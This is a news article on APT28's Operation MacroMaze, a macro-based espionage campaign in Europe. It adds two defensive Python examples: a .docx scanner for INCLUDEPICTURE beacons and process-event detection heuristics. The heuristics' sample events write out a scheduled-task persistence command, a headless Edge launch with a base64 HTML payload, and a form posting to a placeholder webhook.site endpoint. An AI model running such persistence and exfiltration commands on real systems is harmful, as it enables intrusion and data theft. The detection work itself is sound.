Tuesday, February 24, 2026


APT28 launches cyber espionage campaign using webhook-based macro malware in Europe

A new cyber espionage campaign has been linked to the Russia-associated threat group APT28, targeting entities across Western and Central Europe. According to S2 Grupo’s LAB52 threat intelligence team, the cyber activity ran between September 2025 and January 2026 and has been named Operation MacroMaze. Researchers said the cyber attack relies on simple tools and legitimate online services to manage infrastructure and carry out data exfiltration. “The campaign relies on basic tooling and the exploitation of legitimate services for infrastructure and data exfiltration,” the cybersecurity firm stated.

The cyber intrusion begins with spear-phishing emails carrying malicious documents. Each document contains a Word field code, “INCLUDEPICTURE”, stored in the document’s XML, which points at a webhook[.]site URL hosting a JPG image. When the document is opened, Word fetches the image from the remote server, generating an outbound HTTP request. The technique works like a tracking pixel: the request lets the attackers log metadata and confirm that the target opened the document.
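A defender triaging suspect attachments can look for this beacon statically, before any image is fetched. The following is an added example written for this article, not LAB52's tooling: it walks the field codes in an OOXML (.docx) document's XML parts, reconstructs each INCLUDEPICTURE instruction even when Word has split it across several runs, and flags targets that point at a remote HTTP(S) host. The sample document, the placeholder webhook[.]site token and the "known beacon host" list are all constructed for the demonstration; the article does not say which document format the campaign used, so the assumption here is OOXML.

```python
import html
import io
import re
import zipfile
from urllib.parse import urlparse

# Hosts the article describes as abused for beaconing/exfiltration (assumed list).
KNOWN_BEACON_HOSTS = {"webhook.site"}

# Document parts that can carry field codes.
PART_RE = re.compile(r"^word/(document|header\d*|footer\d*)\.xml$")

# One token per field boundary or instruction fragment, in document order.
TOKEN_RE = re.compile(
    r'<w:fldChar[^>]*w:fldCharType="(begin|separate|end)"[^>]*/?>'
    r"|<w:instrText[^>]*>(.*?)</w:instrText>",
    re.S,
)
# INCLUDEPICTURE "<target>" ... or INCLUDEPICTURE <target> ...
INCLUDEPICTURE_RE = re.compile(r'\bINCLUDEPICTURE\s+(?:"([^"]*)"|(\S+))', re.I)


def iter_field_codes(part_xml):
    """Yield the complete instruction text of each field (begin..end)."""
    depth, fragments = 0, []
    for m in TOKEN_RE.finditer(part_xml):
        kind, text = m.group(1), m.group(2)
        if kind == "begin":
            depth += 1
        elif kind == "end":
            depth = max(depth - 1, 0)
            if depth == 0 and fragments:
                yield html.unescape("".join(fragments))
                fragments = []
        elif text is not None and depth > 0:
            fragments.append(text)  # instruction text may be split across runs


def find_includepicture(part_name, part_xml):
    """Return one finding per INCLUDEPICTURE field in this part."""
    findings = []
    for code in iter_field_codes(part_xml):
        m = INCLUDEPICTURE_RE.search(code)
        if not m:
            continue
        target = m.group(1) if m.group(1) is not None else m.group(2)
        parsed = urlparse(target)
        host = (parsed.hostname or "").lower()
        findings.append({
            "part": part_name,
            "field": code.strip(),
            "target": target,
            "remote": parsed.scheme in ("http", "https"),
            "host": host,
            "known_beacon_host": host in KNOWN_BEACON_HOSTS,
        })
    return findings


def scan_docx(source):
    """Scan a .docx given as a path or as bytes; returns a list of findings."""
    handle = io.BytesIO(source) if isinstance(source, (bytes, bytearray)) else source
    findings = []
    with zipfile.ZipFile(handle) as z:
        for name in z.namelist():
            if PART_RE.match(name):
                xml = z.read(name).decode("utf-8", errors="replace")
                findings.extend(find_includepicture(name, xml))
    return findings


# --- constructed sample document (placeholder URL, not a real indicator) ---
SAMPLE_DOCUMENT_XML = r"""<?xml version="1.0" encoding="UTF-8"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body>
<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE "</w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">https://webhook.site/EXAMPLE-TOKEN/image.jpg</w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">" \d</w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>
<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE "C:\Users\Public\logo.png" \d</w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>
<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> DATE </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>
</w:body></w:document>"""

CONTENT_TYPES = ('<?xml version="1.0" encoding="UTF-8"?>'
                 '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')


def build_sample_docx():
    """Build a minimal in-memory .docx containing the constructed XML above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("word/document.xml", SAMPLE_DOCUMENT_XML)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_docx(build_sample_docx()):
        flag = "REMOTE" if f["remote"] else "local"
        print(f"{f['part']}: {flag:6} {f['target']}  beacon_host={f['known_beacon_host']}")
```

Only the remote target is worth an alert; a local INCLUDEPICTURE path is ordinary document behaviour. Because the scanner works on the package XML, it also catches fields hidden in headers and footers, and it does not depend on the image actually being reachable at analysis time.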

Between late September 2025 and January 2026, multiple versions of the malicious files were discovered. Each contained slightly modified macros but followed the same cyber attack logic. The macros function as droppers, helping establish access on compromised systems and deploy additional payloads. “While the core logic of all the macros detected remains consistent, the scripts show an evolution in evasion techniques, ranging from ‘headless’ browser execution in the older version to the use of keyboard simulation (SendKeys) in the newer versions to potentially bypass security prompts,” the cybersecurity company explained.

The macro executes a Visual Basic Script (VBScript), which runs a CMD file that maintains persistence through scheduled tasks. A batch script then loads a small Base64-encoded HTML payload in Microsoft Edge in headless mode to reduce the chance of detection. The payload retrieves commands from webhook[.]site, executes them, captures the output and exfiltrates it to another webhook endpoint. A second variant moves the browser window off-screen instead of using headless mode and closes other Edge processes. “When the resulting HTML file is rendered by Microsoft Edge, the form is submitted, causing the collected command output to be exfiltrated to the remote webhook endpoint without user interaction,” LAB52 said. The firm added, “This campaign proves that simplicity can be powerful,” underscoring how basic tools were arranged carefully to increase stealth and effectiveness.
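Every stage of the chain described above (Office spawning a script host, a scheduled task pointing at a batch file, Edge launched headless or off-screen with an inline HTML payload, webhook[.]site in a command line) leaves a process-creation event that a SIEM or EDR can score. The example below is added here and is not LAB52's detection content: it runs a handful of heuristics over constructed process events. The file paths, task name and webhook[.]site token are placeholders; the `data:text/html;base64,` URL is one assumed way of handing an inline HTML payload to Edge, and `--window-position` with negative coordinates is one assumed way of moving the window off-screen, since the article states neither detail.

```python
import base64
import binascii
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
WINDOW_POS_RE = re.compile(r"--window-position=(-?\d+),(-?\d+)")
DATA_URL_RE = re.compile(r"data:text/html;base64,([A-Za-z0-9+/=]+)")


def basename(path):
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_data_url_html(cmdline):
    """Return the decoded HTML of a base64 data: URL in the command line, or None."""
    m = DATA_URL_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def score_event(ev):
    """Return the names of every heuristic that matches one process event."""
    parent, image, cl = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    low = cl.lower()
    hits = []
    # Macro -> VBScript: an Office process starting a Windows script host.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # Persistence: a scheduled task whose action is a .cmd/.bat file.
    if "schtasks" in low and "/create" in low and re.search(r"\.(cmd|bat)\b", low):
        hits.append("schtasks_persistence_script")
    if image == "msedge.exe":
        if "--headless" in low:
            hits.append("edge_headless")
        m = WINDOW_POS_RE.search(low)  # assumed off-screen technique
        if m and (int(m.group(1)) < 0 or int(m.group(2)) < 0):
            hits.append("edge_offscreen")
    if "webhook.site" in low:
        hits.append("webhook_site_in_cmdline")
    # Inline HTML payload: decode it and inspect where its form posts to.
    page = decode_data_url_html(cl)
    if page is not None:
        hits.append("data_url_html")
        if "webhook.site" in page.lower():
            hits.append("webhook_site_in_payload")
    return hits


def hunt(events):
    """(index, hits) for every event that triggered at least one heuristic."""
    return [(i, h) for i, ev in enumerate(events) if (h := score_event(ev))]


# --- constructed sample events (placeholders, not indicators from the campaign) ---
SAMPLE_HTML = (b'<html><body><form method="post" '
               b'action="https://webhook.site/EXAMPLE-TOKEN"></form></body></html>')
SAMPLE_DATA_URL = "data:text/html;base64," + base64.b64encode(SAMPLE_HTML).decode()

EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\AppData\Local\Temp\update.vbs"'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c schtasks /create /sc minute /mo 10 /tn "Updater" '
                r'/tr "C:\Users\user\AppData\Local\Temp\run.cmd"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": f'msedge.exe --headless "{SAMPLE_DATA_URL}"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": 'msedge.exe --window-position=-32000,-32000 "https://example.invalid/"'},
    {"parent": r"C:\Windows\explorer.exe",          # benign: user opened a site
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": "msedge.exe https://www.example.com/"},
]

if __name__ == "__main__":
    for i, hits in hunt(EVENTS):
        print(f"event {i}: {basename(EVENTS[i]['image'])} -> {', '.join(hits)}")
```

The individual heuristics are noisy on their own (headless Edge is used by legitimate automation), so in practice they are correlated on the process tree: an Office parent, then a script host, then a scheduled task, then Edge with an inline payload within a short window is what makes the sequence worth an analyst's time. The benign final event shows that an ordinary Edge launch scores nothing.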
